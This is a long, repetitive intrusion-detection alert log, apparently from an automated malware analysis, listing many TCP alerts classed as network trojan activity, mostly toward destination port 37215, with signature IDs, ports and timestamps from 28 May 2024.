                  SID:2829579
                  Source Port:36366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789510
                  SID:2829579
                  Source Port:57416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790526
                  SID:2829579
                  Source Port:42252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695302
                  SID:2829579
                  Source Port:39684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298111
                  SID:2835222
                  Source Port:41768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537221
                  SID:2835222
                  Source Port:34240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906795
                  SID:2829579
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886609
                  SID:2835222
                  Source Port:51570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910209
                  SID:2829579
                  Source Port:37556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906522
                  SID:2829579
                  Source Port:56750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849002
                  SID:2829579
                  Source Port:52852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.327150
                  SID:2030490
                  Source Port:56872
                  Destination Port:19990
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529246
                  SID:2829579
                  Source Port:55182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661565
                  SID:2835222
                  Source Port:38576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695747
                  SID:2835222
                  Source Port:56654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601601
                  SID:2829579
                  Source Port:55498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750070
                  SID:2835222
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292664
                  SID:2829579
                  Source Port:46134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316227
                  SID:2835222
                  Source Port:48374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578678
                  SID:2835222
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594462
                  SID:2835222
                  Source Port:36610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651187
                  SID:2829579
                  Source Port:55870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659277
                  SID:2835222
                  Source Port:45428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547665
                  SID:2829579
                  Source Port:48394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745980
                  SID:2829579
                  Source Port:42064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742645
                  SID:2835222
                  Source Port:47524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796563
                  SID:2829579
                  Source Port:42026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661258
                  SID:2835222
                  Source Port:60192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528902
                  SID:2835222
                  Source Port:52932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678738
                  SID:2829579
                  Source Port:51260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.811627
                  SID:2835222
                  Source Port:59212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755576
                  SID:2829579
                  Source Port:34760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549507
                  SID:2829579
                  Source Port:41838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.919995
                  SID:2829579
                  Source Port:58384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542580
                  SID:2829579
                  Source Port:55540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585350
                  SID:2835222
                  Source Port:38822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316232
                  SID:2835222
                  Source Port:51828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789809
                  SID:2835222
                  Source Port:55374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316019
                  SID:2835222
                  Source Port:59974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.575606
                  SID:2835222
                  Source Port:51404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489849
                  SID:2829579
                  Source Port:50654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755601
                  SID:2829579
                  Source Port:44304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860060
                  SID:2829579
                  Source Port:49166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542751
                  SID:2835222
                  Source Port:59676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922743
                  SID:2829579
                  Source Port:45486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911586
                  SID:2829579
                  Source Port:50928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664412
                  SID:2835222
                  Source Port:32996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278391
                  SID:2835222
                  Source Port:57102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2829579
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767633
                  SID:2829579
                  Source Port:58550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.491411
                  SID:2835222
                  Source Port:35580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768667
                  SID:2835222
                  Source Port:48982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931488
                  SID:2835222
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911678
                  SID:2829579
                  Source Port:51178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.550699
                  SID:2829579
                  Source Port:60122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651445
                  SID:2835222
                  Source Port:59432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316643
                  SID:2835222
                  Source Port:56420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.919995
                  SID:2835222
                  Source Port:58384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555616
                  SID:2835222
                  Source Port:34848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323449
                  SID:2835222
                  Source Port:52806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651064
                  SID:2835222
                  Source Port:52304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753911
                  SID:2829579
                  Source Port:33148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793508
                  SID:2829579
                  Source Port:46446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315498
                  SID:2829579
                  Source Port:55410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586091
                  SID:2829579
                  Source Port:41698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703002
                  SID:2835222
                  Source Port:36882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594012
                  SID:2829579
                  Source Port:34714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:29.321024
                  SID:2030489
                  Source Port:19990
                  Destination Port:58198
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719711
                  SID:2835222
                  Source Port:47548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586430
                  SID:2829579
                  Source Port:48164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796696
                  SID:2829579
                  Source Port:39990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837137
                  SID:2829579
                  Source Port:35142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702267
                  SID:2829579
                  Source Port:48704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694844
                  SID:2835222
                  Source Port:42820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577810
                  SID:2829579
                  Source Port:52362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906692
                  SID:2835222
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684239
                  SID:2835222
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529914
                  SID:2829579
                  Source Port:43554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910248
                  SID:2835222
                  Source Port:32854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.584963
                  SID:2829579
                  Source Port:38936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492103
                  SID:2835222
                  Source Port:40624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278693
                  SID:2835222
                  Source Port:37524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.372034
                  SID:2829579
                  Source Port:34948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494418
                  SID:2835222
                  Source Port:49674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.805234
                  SID:2835222
                  Source Port:51696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719875
                  SID:2829579
                  Source Port:49882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720024
                  SID:2829579
                  Source Port:53140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587896
                  SID:2835222
                  Source Port:59462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908046
                  SID:2829579
                  Source Port:59518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547661
                  SID:2835222
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911525
                  SID:2835222
                  Source Port:46204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887896
                  SID:2829579
                  Source Port:42634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576947
                  SID:2835222
                  Source Port:57830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920021
                  SID:2835222
                  Source Port:42742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492406
                  SID:2829579
                  Source Port:50814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659747
                  SID:2835222
                  Source Port:45186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496055
                  SID:2835222
                  Source Port:59352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316235
                  SID:2829579
                  Source Port:42184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696122
                  SID:2829579
                  Source Port:43208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788983
                  SID:2835222
                  Source Port:51996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766003
                  SID:2829579
                  Source Port:33228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742314
                  SID:2829579
                  Source Port:50926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794610
                  SID:2829579
                  Source Port:58782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696299
                  SID:2835222
                  Source Port:44628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527505
                  SID:2835222
                  Source Port:47522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584350
                  SID:2829579
                  Source Port:55518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555354
                  SID:2829579
                  Source Port:33920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278057
                  SID:2835222
                  Source Port:45910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316682
                  SID:2835222
                  Source Port:44670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593103
                  SID:2835222
                  Source Port:55310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799422
                  SID:2835222
                  Source Port:53578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491831
                  SID:2829579
                  Source Port:38300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755595
                  SID:2835222
                  Source Port:38992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789876
                  SID:2829579
                  Source Port:47284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931604
                  SID:2829579
                  Source Port:40404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.801987
                  SID:2829579
                  Source Port:43614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277376
                  SID:2835222
                  Source Port:53328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790331
                  SID:2835222
                  Source Port:39720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920041
                  SID:2835222
                  Source Port:45004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.299107
                  SID:2829579
                  Source Port:46066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312375
                  SID:2835222
                  Source Port:56750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316509
                  SID:2829579
                  Source Port:46192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492480
                  SID:2835222
                  Source Port:37186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577212
                  SID:2835222
                  Source Port:52636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312641
                  SID:2835222
                  Source Port:37934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.792740
                  SID:2829579
                  Source Port:40312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530023
                  SID:2829579
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543179
                  SID:2829579
                  Source Port:50030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278130
                  SID:2835222
                  Source Port:60488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536559
                  SID:2835222
                  Source Port:51986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742471
                  SID:2829579
                  Source Port:36504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529668
                  SID:2835222
                  Source Port:60824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874013
                  SID:2835222
                  Source Port:39162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.372035
                  SID:2835222
                  Source Port:46814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649858
                  SID:2835222
                  Source Port:34892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316046
                  SID:2829579
                  Source Port:32918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719717
                  SID:2835222
                  Source Port:47628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622237
                  SID:2835222
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702143
                  SID:2835222
                  Source Port:49196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911294
                  SID:2829579
                  Source Port:34752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493422
                  SID:2829579
                  Source Port:36448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719413
                  SID:2835222
                  Source Port:44662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586330
                  SID:2835222
                  Source Port:57910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737535
                  SID:2835222
                  Source Port:50212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584166
                  SID:2829579
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.669618
                  SID:2835222
                  Source Port:56080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912127
                  SID:2835222
                  Source Port:37366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276793
                  SID:2835222
                  Source Port:37060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664301
                  SID:2835222
                  Source Port:46118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886267
                  SID:2835222
                  Source Port:38298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923052
                  SID:2829579
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.803718
                  SID:2835222
                  Source Port:33500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843860
                  SID:2829579
                  Source Port:47828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844914
                  SID:2829579
                  Source Port:35510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845850
                  SID:2829579
                  Source Port:60360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555670
                  SID:2835222
                  Source Port:59148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529953
                  SID:2829579
                  Source Port:36456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660420
                  SID:2829579
                  Source Port:60906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788341
                  SID:2835222
                  Source Port:47360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847591
                  SID:2829579
                  Source Port:39176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930080
                  SID:2835222
                  Source Port:49650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316539
                  SID:2829579
                  Source Port:57862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907222
                  SID:2829579
                  Source Port:48822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312314
                  SID:2829579
                  Source Port:35060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278223
                  SID:2835222
                  Source Port:48682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729759
                  SID:2829579
                  Source Port:51030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.771026
                  SID:2835222
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296628
                  SID:2835222
                  Source Port:55268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530210
                  SID:2835222
                  Source Port:51284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912547
                  SID:2829579
                  Source Port:44214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495944
                  SID:2835222
                  Source Port:46082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881181
                  SID:2835222
                  Source Port:55014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920009
                  SID:2835222
                  Source Port:32962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576145
                  SID:2835222
                  Source Port:60234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543456
                  SID:2835222
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596435
                  SID:2829579
                  Source Port:47224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720296
                  SID:2835222
                  Source Port:56830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788290
                  SID:2829579
                  Source Port:60610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845824
                  SID:2835222
                  Source Port:53078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817724
                  SID:2829579
                  Source Port:42488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729762
                  SID:2835222
                  Source Port:58712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755631
                  SID:2835222
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312588
                  SID:2829579
                  Source Port:36580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
